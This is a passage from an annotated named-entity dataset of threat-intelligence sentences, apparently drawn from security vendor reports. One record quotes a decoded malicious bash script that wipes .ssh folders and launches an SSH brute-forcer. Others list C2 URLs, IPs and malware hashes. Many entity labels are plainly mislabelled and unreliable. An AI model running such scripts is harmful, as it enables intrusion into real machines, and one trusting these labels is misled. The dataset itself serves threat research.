8.","entities":[{"id":30524,"label":"malware","start_offset":19,"end_offset":24},{"id":30525,"label":"location","start_offset":34,"end_offset":37},{"id":30526,"label":"location","start_offset":54,"end_offset":58},{"id":30527,"label":"IPV4","start_offset":71,"end_offset":89}],"relations":[],"Comments":[]} {"id":11266,"text":"Delete email message Permanently deletes the specified email message from the user\u2019s mailbox","entities":[],"relations":[],"Comments":[]} {"id":425,"text":"Because of this, people can earn digital currency credit in exchange for the use of their computing resources to power that digital currency\u2019s infrastructure.","entities":[],"relations":[],"Comments":[]} {"id":528,"text":"32-bit EXE is the most common ransomware file type we observed.","entities":[],"relations":[],"Comments":[]} {"id":980,"text":"Some of the infected apps purport to contain or display adult content.","entities":[],"relations":[],"Comments":[]} {"id":2253,"text":"The results of these commands are uploaded to the C2 server.","entities":[],"relations":[],"Comments":[]} {"id":9894,"text":"Job Opportunity SIPCHEM 7\/30\/18 jobs@sipchem.ga","entities":[{"id":30202,"label":"location","start_offset":0,"end_offset":3},{"id":30203,"label":"location","start_offset":4,"end_offset":15},{"id":30204,"label":"EMAIL","start_offset":32,"end_offset":47}],"relations":[],"Comments":[]} {"id":6968,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} {"id":7362,"text":"Decoding the scanner revealed the following codes: #!\/bin\/bash cd \/tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix mkdir .X19-unix cd .X19-unix mv \/var\/tmp\/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd \/tmp\/.X19-unix\/.rsync\/c nohup \/tmp\/.X19-unix\/.rsync\/c\/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 \/tmp\/up.txt 192.168 >> \/dev\/null 2>1& sleep 8m && nohup \/tmp\/.X19-unix\/.rsync\/c\/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0","entities":[],"relations":[],"Comments":[]} {"id":11147,"text":"We terminated 4 YouTube channels as part of our actions against a coordinated influence operation.","entities":[],"relations":[],"Comments":[]} {"id":8331,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} {"id":2803,"text":"On Friday May 12, 2017, Microsoft took the extraordinary step of releasing patches for out-of-support versions of Windows to help protect against these attacks.","entities":[{"id":48019,"label":"TIME","start_offset":10,"end_offset":22},{"id":48020,"label":"identity","start_offset":24,"end_offset":33},{"id":48021,"label":"SOFTWARE","start_offset":114,"end_offset":121}],"relations":[],"Comments":[]} {"id":7570,"text":"The payload can vary in each campaign, but it typically uses the FlawedAmmyy downloader, ServHelper, or RMS RAT launcher.","entities":[{"id":23611,"label":"location","start_offset":12,"end_offset":15},{"id":23612,"label":"location","start_offset":29,"end_offset":37},{"id":23613,"label":"malware","start_offset":65,"end_offset":76}],"relations":[],"Comments":[]} {"id":3508,"text":"The following is a list of Protux\u2019s notable components and their functions: FileManage - Lists all of the system\u2019s drives and folders.","entities":[{"id":49301,"label":"malware","start_offset":27,"end_offset":33}],"relations":[],"Comments":[]} {"id":10275,"text":"showing","entities":[],"relations":[],"Comments":[]} {"id":13621,"text":"This utility has a feature called \u201cImport Adder,\u201d while \u201c.newimp\u201d is the default name of a newly added section containing newly added imports.","entities":[],"relations":[],"Comments":[]} {"id":12388,"text":"We terminated 8 YouTube channels as part of our actions against a coordinated influence operation linked to Yemen.","entities":[],"relations":[],"Comments":[]} {"id":4421,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} {"id":5076,"text":"The earliest evidence we have of this exploit kit being actively deployed is January 4, 2022.","entities":[{"id":51186,"label":"TIME","start_offset":77,"end_offset":92}],"relations":[],"Comments":[]} {"id":9881,"text":"The group puts up multiple layers of obfuscation to run these C&C servers in extremely targeted malware campaigns against organizations in the Middle East, the U.S., and Asia.","entities":[{"id":30117,"label":"attack-pattern","start_offset":87,"end_offset":103},{"id":30120,"label":"location","start_offset":166,"end_offset":169}],"relations":[],"Comments":[]} {"id":4587,"text":" The vulnerability has been dubbed as ProxyLogon by the researchers at DEVCORE, who are credited with finding the bugs in the proxy architecture and the logon mechanism of Exchange.","entities":[{"id":50446,"label":"SOFTWARE","start_offset":172,"end_offset":180},{"id":50444,"label":"vulnerability","start_offset":38,"end_offset":48},{"id":50445,"label":"identity","start_offset":71,"end_offset":78}],"relations":[{"id":974,"from_id":50446,"to_id":50444,"type":"has"}],"Comments":[]} {"id":5010,"text":"Google\u2019s Threat Analysis Group (TAG) has been closely monitoring the cybersecurity activity in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":51063,"label":"identity","start_offset":0,"end_offset":36},{"id":51064,"label":"location","start_offset":95,"end_offset":109},{"id":51065,"label":"location","start_offset":136,"end_offset":143}],"relations":[],"Comments":[]} {"id":9480,"text":"Table 2.","entities":[],"relations":[],"Comments":[]} {"id":4186,"text":"Exploit public-facing application Execution T1059.001","entities":[{"id":49987,"label":"attack-pattern","start_offset":0,"end_offset":53}],"relations":[],"Comments":[]} {"id":6667,"text":"VDI solutions can provide protection against a destructive malware like Disttrack through the ability to load snapshots of wiped systems to recover from a wiper attack.","entities":[{"id":20693,"label":"location","start_offset":14,"end_offset":17},{"id":20694,"label":"location","start_offset":26,"end_offset":36},{"id":20696,"label":"location","start_offset":105,"end_offset":109},{"id":20697,"label":"malware","start_offset":155,"end_offset":160}],"relations":[],"Comments":[]} {"id":3987,"text":"The guideline thoroughly explains the three most common methods threat groups use to infiltrate the supply chain.","entities":[],"relations":[],"Comments":[]} {"id":9422,"text":"In this stage, a blob of payload data is decrypted using a hard-coded key (2726c6aea9970bb95211304705b5f595) and what appears to be an RC4 (Rivest Cipher 4) algorithm.","entities":[{"id":29001,"label":"location","start_offset":59,"end_offset":63},{"id":29002,"label":"MD5","start_offset":75,"end_offset":107},{"id":29003,"label":"location","start_offset":109,"end_offset":112}],"relations":[],"Comments":[]} {"id":9571,"text":"GET http:\/\/{C2}\/Index.php?Ck=OK HTTP\/1.1","entities":[{"id":29366,"label":"URL","start_offset":4,"end_offset":28}],"relations":[],"Comments":[]} {"id":8809,"text":"Shortly after the U.S. Treasury sanctioned Ukrainian Parliament member Andrii Derkach for attempting to influence the U.S. electoral process, we removed 14 Google accounts that were linked to him.","entities":[],"relations":[],"Comments":[]} {"id":7049,"text":"The launcher decrypts the data.res file with a different hardcoded DES key.","entities":[],"relations":[],"Comments":[]} {"id":353,"text":"CHS\u2019s 8-K filing on Monday did not reveal how the attackers got into their network, only that the records of approximately 4.5 million patients were stolen in attacks in between April and June of 2014.","entities":[{"id":46048,"label":"identity","start_offset":0,"end_offset":3},{"id":46049,"label":"TIME","start_offset":20,"end_offset":26},{"id":46050,"label":"TIME","start_offset":178,"end_offset":184},{"id":46051,"label":"TIME","start_offset":188,"end_offset":200}],"relations":[],"Comments":[]} {"id":9115,"text":"Lurk\u2019s transition from simple web-browser-exploiting crooks to organized cybercriminals also stood out.","entities":[{"id":28147,"label":"malware","start_offset":0,"end_offset":4},{"id":28148,"label":"location","start_offset":53,"end_offset":59}],"relations":[],"Comments":[]} {"id":14008,"text":"The following sections describe the different correlations and are divided into two main categories: Correlation related to the malware author developing environment Correlation associated with TTPs Note that some leads are stronger than others; however, when combined, they suggest that the same threat actor behind malware previously attributed to APT37 is likely responsible for Operation Earth Kitsune.","entities":[{"id":47183,"label":"campaign","start_offset":384,"end_offset":407},{"id":43419,"label":"threat-actor","start_offset":352,"end_offset":357}],"relations":[],"Comments":[]} {"id":106,"text":"Similarly, DarkSide operators used Mega client for exfiltrating files to cloud storage, 7-Zip for archiving, and PuTTY application for network file transfers.","entities":[{"id":45834,"label":"threat-actor","start_offset":11,"end_offset":29},{"id":45835,"label":"tools","start_offset":35,"end_offset":46},{"id":45836,"label":"tools","start_offset":88,"end_offset":93},{"id":45837,"label":"tools","start_offset":113,"end_offset":118}],"relations":[{"id":120,"from_id":45834,"to_id":45835,"type":"uses"},{"id":121,"from_id":45834,"to_id":45836,"type":"uses"},{"id":122,"from_id":45834,"to_id":45837,"type":"uses"}],"Comments":[]} {"id":13582,"text":"The attack we found only works on Series 2 of EC-CUBE; the current version is Series 4, with Series 2 now under extended support.","entities":[{"id":51667,"label":"tools","start_offset":34,"end_offset":53},{"id":51668,"label":"tools","start_offset":78,"end_offset":86}],"relations":[],"Comments":[]} {"id":1393,"text":"Read more on the XSOAR marketplace.","entities":[],"relations":[],"Comments":[]} {"id":4719,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[{"id":50617,"label":"TIME","start_offset":3,"end_offset":16},{"id":50618,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50619,"label":"SOFTWARE","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} {"id":2768,"text":"They can be used to: These are all likely outcomes from mass scanning of the Internet for vulnerable hosts, which are already underway.","entities":[],"relations":[],"Comments":[]} {"id":5257,"text":"Timestamps indicate that the earliest sample was signed on June 2015; the latest variant was signed on May 2017.","entities":[{"id":51296,"label":"TIME","start_offset":59,"end_offset":68},{"id":51297,"label":"TIME","start_offset":103,"end_offset":111}],"relations":[],"Comments":[]} {"id":1731,"text":"Attackers can gain access to your personal and financial information.","entities":[],"relations":[],"Comments":[]} {"id":1675,"text":"The user needs to know the IP of the infected client, the port used by malware and the encryption password to properly decode the traffic.","entities":[],"relations":[],"Comments":[]} {"id":9960,"text":"They carried this out by first stealing the company\u2019s certificate then using it to sign the malware.","entities":[],"relations":[],"Comments":[]} {"id":4736,"text":"The growth of commercial spyware vendors and hack-for-hire groups has necessitated growth in TAG to counter these threats.","entities":[{"id":50648,"label":"identity","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} {"id":4445,"text":"It was last updated on July 29, 2022.","entities":[{"id":50219,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} {"id":4198,"text":"OS Credential Dumping: Credentials in Registry Lateral Movement T1021.002","entities":[{"id":50004,"label":"attack-pattern","start_offset":0,"end_offset":73}],"relations":[],"Comments":[]} {"id":10656,"text":"Vulnerabilities of Apache HTTP Server have increased since 2017 Open-source web servers, especially Apache HTTP Server, have been heavily exploited in the past five years.","entities":[{"id":32529,"label":"attack-pattern","start_offset":69,"end_offset":75}],"relations":[],"Comments":[]} {"id":6952,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":6115,"text":"The PlugX sample in Table 3 also uses the legitimate PixelPlus Co., Ltd certificate and was also targeted against the university.","entities":[{"id":18910,"label":"tools","start_offset":4,"end_offset":9},{"id":18911,"label":"location","start_offset":10,"end_offset":16},{"id":18914,"label":"location","start_offset":84,"end_offset":87},{"id":18915,"label":"location","start_offset":118,"end_offset":128}],"relations":[],"Comments":[]} {"id":3410,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A ba44c22a3224c3a201202b69d86df2a78f0cd1d4ac1119eb29cae33f09027a9a Silverlight2.exe","entities":[{"id":10289,"label":"malware","start_offset":0,"end_offset":11},{"id":10290,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49090,"label":"malware","start_offset":20,"end_offset":44},{"id":49091,"label":"FILEPATH","start_offset":112,"end_offset":128}],"relations":[{"id":681,"from_id":10289,"to_id":49090,"type":"duplicate-of"},{"id":682,"from_id":49091,"to_id":10290,"type":"duplicate-of"},{"id":683,"from_id":49091,"to_id":49090,"type":"indicates"},{"id":684,"from_id":10290,"to_id":49090,"type":"indicates"}],"Comments":[]} {"id":14243,"text":"We mapped Winnti\u2019s activities for this campaign by analyzing the dates exposed in GitHub.","entities":[{"id":48437,"label":"identity","start_offset":10,"end_offset":16},{"id":48438,"label":"SOFTWARE","start_offset":82,"end_offset":88}],"relations":[],"Comments":[]} {"id":14308,"text":"Setup.exe is the core module used to steal data.","entities":[{"id":48529,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":7166,"text":"This research is done in cooperation with IssueMakersLab of South Korea.","entities":[],"relations":[],"Comments":[]} {"id":2103,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) A recent vulnerability in the Kerberos authentication protocol, CVE-2020-17049 (dubbed Bronze Bit), has been disclosed by Microsoft.","entities":[{"id":45392,"label":"identity","start_offset":175,"end_offset":184},{"id":45390,"label":"vulnerability","start_offset":117,"end_offset":131},{"id":45393,"label":"SOFTWARE","start_offset":83,"end_offset":91},{"id":45391,"label":"vulnerability","start_offset":140,"end_offset":150}],"relations":[{"id":95,"from_id":45391,"to_id":45390,"type":"duplicate-of"}],"Comments":[]} {"id":1839,"text":"Searching for processes We found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following DeviceIoControl call.","entities":[{"id":45144,"label":"FILEPATH","start_offset":42,"end_offset":54}],"relations":[],"Comments":[]} {"id":13384,"text":"Attacker Owned Domains: ","entities":[],"relations":[],"Comments":[]} {"id":2499,"text":" Palo Alto Networks Cortex XSOAR customers can leverage the \"Spring Core and Cloud Function SpEL RCEs\" pack to automatically detect and mitigate the vulnerabilities.","entities":[{"id":47597,"label":"vulnerability","start_offset":61,"end_offset":101},{"id":47596,"label":"SOFTWARE","start_offset":1,"end_offset":32}],"relations":[],"Comments":[]} {"id":5445,"text":"But, mobile banking use is picking up around the globe.","entities":[],"relations":[],"Comments":[]} {"id":7026,"text":"SysUpdate was first described by the NCC Group in 2018.","entities":[{"id":22036,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":13699,"text":"Confirm requests using other channels.","entities":[],"relations":[],"Comments":[]} {"id":6345,"text":"Figure 9 is a screenshot of the default Windows File Explorer; \u201cshow hidden files\u201d is not checked.","entities":[],"relations":[],"Comments":[]} {"id":9384,"text":"We also conclude that this is the initial phase of an attack based on the following reasons: CallerSpy, as it is now, could prove uneven for a targeted attack.","entities":[],"relations":[],"Comments":[]} {"id":1358,"text":"Later that day, a public PoC surfaced, allowing organizations to better understand this vulnerability and how it is exploited.","entities":[{"id":4075,"label":"TIME","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":2464,"text":"However, in many cases the filename had an extension that would not support a webshell, such as .js and .txt, which we believe was used just to mark the presence of a successful file upload as part of vulnerable server discovery efforts.","entities":[],"relations":[],"Comments":[]} {"id":4559,"text":"In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro.","entities":[{"id":50373,"label":"SOFTWARE","start_offset":18,"end_offset":25},{"id":50375,"label":"malware","start_offset":52,"end_offset":68},{"id":50376,"label":"DOMAIN","start_offset":107,"end_offset":118},{"id":50374,"label":"malware","start_offset":39,"end_offset":50}],"relations":[],"Comments":[]} {"id":7709,"text":" The newer version shows that the developers behind ServHelper continued to upgrade it to evade detection and add more functions, possibly for even more iterations in the future.","entities":[{"id":23958,"label":"malware","start_offset":52,"end_offset":62},{"id":23959,"label":"location","start_offset":106,"end_offset":109}],"relations":[],"Comments":[]} {"id":6636,"text":" https:\/\/unit42.paloaltonetworks.com\/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government\/ https:\/\/unit42.paloaltonetworks.com\/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east\/ https:\/\/unit42.paloaltonetworks.com\/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications\/","entities":[],"relations":[],"Comments":[]} {"id":13280,"text":"Snapshot of code we used to decrypt TClient\u2019s configuration Figure 11.","entities":[{"id":41375,"label":"malware","start_offset":36,"end_offset":43}],"relations":[],"Comments":[]} {"id":11796,"text":"Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021.","entities":[{"id":36377,"label":"location","start_offset":45,"end_offset":48},{"id":36378,"label":"threat-actor","start_offset":91,"end_offset":96}],"relations":[],"Comments":[]} {"id":4423,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} {"id":3390,"text":"test4.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 3589e53c59d9807cca709387bbcaaffc7e24e15d9a78425b717fc55c779b928e","entities":[{"id":10240,"label":"malware","start_offset":11,"end_offset":22},{"id":10241,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49042,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":49043,"label":"malware","start_offset":31,"end_offset":55}],"relations":[{"id":592,"from_id":49042,"to_id":49043,"type":"indicates"},{"id":593,"from_id":10241,"to_id":49043,"type":"indicates"},{"id":594,"from_id":10240,"to_id":49043,"type":"duplicate-of"},{"id":595,"from_id":49042,"to_id":10241,"type":"duplicate-of"}],"Comments":[]} {"id":1151,"text":"And \u201cjh\u201d is always followed by a key from the left side of the keyboard.","entities":[],"relations":[],"Comments":[]} {"id":2210,"text":"This leads us to the next stage of our malware This particular stage of malware acts as a downloader.","entities":[],"relations":[],"Comments":[]} {"id":10937,"text":" Conclusion ","entities":[],"relations":[],"Comments":[]} {"id":9782,"text":"It is important that employers and employees across all organizations and enterprises be able to identify phishing attacks and distinguish legitimate emails from malicious ones.","entities":[{"id":29795,"label":"location","start_offset":31,"end_offset":34},{"id":29796,"label":"location","start_offset":70,"end_offset":73},{"id":29797,"label":"attack-pattern","start_offset":106,"end_offset":114},{"id":29798,"label":"location","start_offset":123,"end_offset":126}],"relations":[],"Comments":[]} {"id":9472,"text":"This is the main client binary written in C++, which is the last stage of PuppetLoader\u2019s infection chain.","entities":[{"id":29101,"label":"malware","start_offset":74,"end_offset":86}],"relations":[],"Comments":[]} {"id":1020,"text":" Other sellers were also able to offer customizable email accounts from a specific domain\/institution.","entities":[],"relations":[],"Comments":[]} {"id":6955,"text":" Figure 10.","entities":[],"relations":[],"Comments":[]} {"id":2755,"text":" vulnerable this is a test ","entities":[],"relations":[],"Comments":[]} {"id":1526,"text":" Similar to any other malware family or threat, Palo Alto Networks customers should use the entire security framework for threat mitigation and threat prevention coverage. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46788,"label":"identity","start_offset":48,"end_offset":66}],"relations":[],"Comments":[]} {"id":13556,"text":"This campaign appears to be financially motivated.","entities":[],"relations":[],"Comments":[]} {"id":4094,"text":"All data will then be encrypted and sent back. Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":13990,"text":" Tags Cloud | APT & Targeted Attacks | Expert Perspective | Articles, News, Reports | Cyber Threats","entities":[],"relations":[],"Comments":[]} {"id":7418,"text":"Indicators of Compromise (IoCs) SHA256 Description Detection Name 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa Cryptocurrency miner Trojan.SH.MALXMR.UWEJP b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d Shellbot Backdoor.SH.SHELLBOT.AA 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 Tool Trojan.Linux.SSHBRUTE.B fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL32 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL64 URLs 159[.]203[.]141[.]208 104[.]236[.]192[.]6 45[.]9[.]148[.]129:80 Miner pool 45[.]9[.]148[.]125:80 Miner pool http:\/\/www[.]minpop[.]com\/sk12pack\/idents.php Command and control http:\/\/www[.]minpop[.]com\/sk12pack\/names.php Command and control MITRE ATT&CK Matrix Tags Malware | APT & Targeted Attacks | Endpoints | IoT | Research | Network","entities":[{"id":23053,"label":"SHA2","start_offset":67,"end_offset":131},{"id":23054,"label":"location","start_offset":147,"end_offset":152},{"id":23055,"label":"MD5","start_offset":176,"end_offset":240},{"id":23056,"label":"SHA1","start_offset":274,"end_offset":338},{"id":23057,"label":"location","start_offset":339,"end_offset":343},{"id":23058,"label":"SHA1","start_offset":368,"end_offset":432},{"id":23059,"label":"location","start_offset":448,"end_offset":453},{"id":23060,"label":"malware","start_offset":454,"end_offset":463},{"id":23061,"label":"SHA2","start_offset":485,"end_offset":549},{"id":23062,"label":"location","start_offset":565,"end_offset":570},{"id":23063,"label":"malware","start_offset":571,"end_offset":580},{"id":23064,"label":"IPV4","start_offset":610,"end_offset":631},{"id":23065,"label":"IPV4","start_offset":633,"end_offset":652},{"id":23066,"label":"location","start_offset":681,"end_offset":686},{"id":23067,"label":"location","start_offset":687,"end_offset":691},{"id":23068,"label":"location","start_offset":721,"end_offset":726},{"id":23069,"label":"location","start_offset":727,"end_offset":731},{"id":23070,"label":"URL","start_offset":733,"end_offset":758},{"id":23071,"label":"location","start_offset":795,"end_offset":798},{"id":23072,"label":"URL","start_offset":808,"end_offset":833},{"id":23073,"label":"location","start_offset":870,"end_offset":873},{"id":23074,"label":"location","start_offset":930,"end_offset":933}],"relations":[],"Comments":[]} {"id":12424,"text":"The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains.","entities":[],"relations":[],"Comments":[]} {"id":1825,"text":"We noted the unusual use of cmd.exe for execution of the file.","entities":[{"id":5374,"label":"malware","start_offset":28,"end_offset":35}],"relations":[],"Comments":[]} {"id":1892,"text":"The Bahamut Link Fake websites","entities":[{"id":5568,"label":"threat-actor","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":6418,"text":"X64 Brute Ratel C4 Samples: 3ED21A4BFCF9838E06AD3058D13D5C28026C17DC996953A22A00F0609B0DF3B9 3AD53495851BAFC48CAF6D2227A434CA2E0BEF9AB3BD40ABFE4EA8F318D37BBE 973F573CAB683636D9A70B8891263F59E2F02201FFB4DD2E9D7ECBB1521DA03E DD8652E2DCFE3F1A72631B3A9585736FBE77FFABEE4098F6B3C48E1469BF27AA E1A9B35CF1378FDA12310F0920C5C53AD461858B3CB575697EA125DFEE829611 EF9B60AA0E4179C16A9AC441E0A21DC3A1C3DC04B100EE487EABF5C5B1F571A6 D71DC7BA8523947E08C6EEC43A726FE75AED248DFD3A7C4F6537224E9ED05F6F 5887C4646E032E015AA186C5970E8F07D3ED1DE8DBFA298BA4522C89E547419B Malicious DLLs: EA2876E9175410B6F6719F80EE44B9553960758C7D0F7BED73C0FE9A78D8E669 Malicious Encrypted Payloads: B5D1D3C1AEC2F2EF06E7D0B7996BC45DF4744934BD66266A6EBB02D70E35236E X.509 Cert SHA1s: 55684a30a47476fce5b42cbd59add4b0fbc776a3 66aab897e33b3e4d940c51eba8d07f5605d5b275 Infrastructure linked to X.509 Certs or Samples: 104.6.92[.]229 137.184.199[.]17 138.68.50[.]218 138.68.58[.]43 139.162.195[.]169 139.180.187[.]179 147.182.247[.]103 149.154.100[.]151 15.206.84[.]52 159.223.49[.]16 159.65.186[.]50 162.216.240[.]61 172.105.102[.]247 172.81.62[.]82 174.129.157[.]251 178.79.143[.]149 178.79.168[.]110 178.79.172[.]35 18.133.26[.]247 18.130.233[.]249 18.217.179[.]8 18.236.92[.]31 185.138.164[.]112 194.29.186[.]67 194.87.70[.]14 213.168.249[.]232 3.110.56[.]219 3.133.7[.]69 31.184.198[.]83 34.195.122[.]225 34.243.172[.]90 35.170.243[.]216 45.144.225[.]3 45.76.155[.]71 45.79.36[.]192 52.48.51[.]67 52.90.228[.]203 54.229.102[.]30 54.90.137[.]213 89.100.107[.]65 92.255.85[.]173 92.255.85[.]44 94.130.130[.]43 ds.windowsupdate.eu[.]org Hunting for APT29 Spear Phishing Using XDR - Palo Alto Networks Blog Cozy Smuggled Into The Box: APT29 Abusing Legitimate Software For Targeted Operations In Europe Trello From the Other Side: Tracking APT29 Phishing Campaigns New sophisticated email-based attack from NOBELIUM Updated July 6, 2022, at 9:30 a.m. PT.","entities":[{"id":19918,"label":"SHA2","start_offset":29,"end_offset":93},{"id":19919,"label":"SHA2","start_offset":94,"end_offset":158},{"id":19920,"label":"SHA2","start_offset":159,"end_offset":223},{"id":19921,"label":"SHA2","start_offset":224,"end_offset":288},{"id":19922,"label":"SHA2","start_offset":289,"end_offset":353},{"id":19923,"label":"SHA2","start_offset":354,"end_offset":418},{"id":19924,"label":"SHA2","start_offset":419,"end_offset":483},{"id":19925,"label":"SHA2","start_offset":484,"end_offset":548},{"id":19926,"label":"SHA2","start_offset":567,"end_offset":631},{"id":19927,"label":"SHA2","start_offset":664,"end_offset":728},{"id":19928,"label":"MD5","start_offset":749,"end_offset":789},{"id":19929,"label":"SHA1","start_offset":790,"end_offset":830},{"id":19930,"label":"IPV4","start_offset":882,"end_offset":896},{"id":19931,"label":"IPV4","start_offset":897,"end_offset":913},{"id":19932,"label":"IPV4","start_offset":914,"end_offset":929},{"id":19933,"label":"IPV4","start_offset":930,"end_offset":944},{"id":19934,"label":"IPV4","start_offset":945,"end_offset":962},{"id":19935,"label":"IPV4","start_offset":963,"end_offset":980},{"id":19936,"label":"IPV4","start_offset":981,"end_offset":998},{"id":19937,"label":"IPV4","start_offset":999,"end_offset":1016},{"id":19938,"label":"IPV4","start_offset":1017,"end_offset":1031},{"id":19939,"label":"IPV4","start_offset":1032,"end_offset":1047},{"id":19940,"label":"IPV4","start_offset":1048,"end_offset":1063},{"id":19941,"label":"IPV4","start_offset":1064,"end_offset":1080},{"id":19942,"label":"IPV4","start_offset":1081,"end_offset":1098},{"id":19943,"label":"IPV4","start_offset":1099,"end_offset":1113},{"id":19944,"label":"IPV4","start_offset":1114,"end_offset":1131},{"id":19945,"label":"IPV4","start_offset":1132,"end_offset":1148},{"id":19946,"label":"IPV4","start_offset":1149,"end_offset":1165},{"id":19947,"label":"IPV4","start_offset":1166,"end_offset":1181},{"id":19948,"label":"IPV4","start_offset":1182,"end_offset":1197},{"id":19949,"label":"IPV4","start_offset":1198,"end_offset":1214},{"id":19950,"label":"IPV4","start_offset":1215,"end_offset":1229},{"id":19951,"label":"IPV4","start_offset":1230,"end_offset":1244},{"id":19952,"label":"IPV4","start_offset":1245,"end_offset":1262},{"id":19953,"label":"IPV4","start_offset":1263,"end_offset":1278},{"id":19954,"label":"IPV4","start_offset":1279,"end_offset":1293},{"id":19955,"label":"IPV4","start_offset":1294,"end_offset":1311},{"id":19956,"label":"IPV4","start_offset":1312,"end_offset":1326},{"id":19957,"label":"IPV4","start_offset":1327,"end_offset":1339},{"id":19958,"label":"IPV4","start_offset":1340,"end_offset":1355},{"id":19959,"label":"IPV4","start_offset":1356,"end_offset":1372},{"id":19960,"label":"IPV4","start_offset":1373,"end_offset":1388},{"id":19961,"label":"IPV4","start_offset":1389,"end_offset":1405},{"id":19962,"label":"IPV4","start_offset":1406,"end_offset":1420},{"id":19963,"label":"IPV4","start_offset":1421,"end_offset":1435},{"id":19964,"label":"IPV4","start_offset":1436,"end_offset":1450},{"id":19965,"label":"IPV4","start_offset":1451,"end_offset":1464},{"id":19966,"label":"IPV4","start_offset":1465,"end_offset":1480},{"id":19967,"label":"IPV4","start_offset":1481,"end_offset":1496},{"id":19968,"label":"IPV4","start_offset":1497,"end_offset":1512},{"id":19969,"label":"IPV4","start_offset":1513,"end_offset":1528},{"id":19970,"label":"IPV4","start_offset":1529,"end_offset":1544},{"id":19971,"label":"IPV4","start_offset":1545,"end_offset":1559},{"id":19972,"label":"IPV4","start_offset":1560,"end_offset":1575},{"id":19974,"label":"location","start_offset":1603,"end_offset":1610},{"id":19975,"label":"threat-actor","start_offset":1615,"end_offset":1620},{"id":19976,"label":"attack-pattern","start_offset":1621,"end_offset":1635},{"id":19977,"label":"identity","start_offset":1648,"end_offset":1666},{"id":19978,"label":"threat-actor","start_offset":1700,"end_offset":1705},{"id":19979,"label":"location","start_offset":1761,"end_offset":1767},{"id":19980,"label":"threat-actor","start_offset":1805,"end_offset":1810},{"id":19981,"label":"attack-pattern","start_offset":1811,"end_offset":1819},{"id":19984,"label":"TIME","start_offset":1907,"end_offset":1919}],"relations":[],"Comments":[]} {"id":7374,"text":"head -n 1 cat \/proc\/cpuinfo | grep name |","entities":[],"relations":[],"Comments":[]} {"id":2407,"text":"Affected Software and Versions Background on the Spring Framework Root Cause Analysis for CVE-2022-22965","entities":[{"id":47486,"label":"vulnerability","start_offset":90,"end_offset":104},{"id":47485,"label":"SOFTWARE","start_offset":49,"end_offset":65}],"relations":[{"id":335,"from_id":47485,"to_id":47486,"type":"has"}],"Comments":[]} {"id":8257,"text":"Once the multiple layers of script obfuscation are removed, the final payload arrives\u2014a version of the njRAT Trojan; this family has been a known threat since 2015.","entities":[{"id":25496,"label":"location","start_offset":47,"end_offset":50},{"id":25497,"label":"malware","start_offset":103,"end_offset":108}],"relations":[],"Comments":[]} {"id":13902,"text":"It is the last step before the ransomware is dropped, and the attack often speeds up at this point to complete the process before it is stopped.","entities":[],"relations":[],"Comments":[]} {"id":3208,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":6051,"text":"We did not recover any responses from those URLs.","entities":[],"relations":[],"Comments":[]} {"id":1679,"text":"We hope this tool will be valuable to incident responders and others who are plagued by NetWire infections.","entities":[{"id":4985,"label":"malware","start_offset":88,"end_offset":95}],"relations":[],"Comments":[]} {"id":8583,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":26532,"label":"threat-actor","start_offset":62,"end_offset":67},{"id":26533,"label":"location","start_offset":81,"end_offset":85}],"relations":[],"Comments":[]} {"id":14089,"text":"Note the following similarities: The usage of paths C:\\Users and D:\\ are similar The searching patterns are very similar The extension list is very similar ","entities":[{"id":48171,"label":"FILEPATH","start_offset":66,"end_offset":69},{"id":48170,"label":"FILEPATH","start_offset":53,"end_offset":61}],"relations":[],"Comments":[]} {"id":10493,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} {"id":10381,"text":"The user would 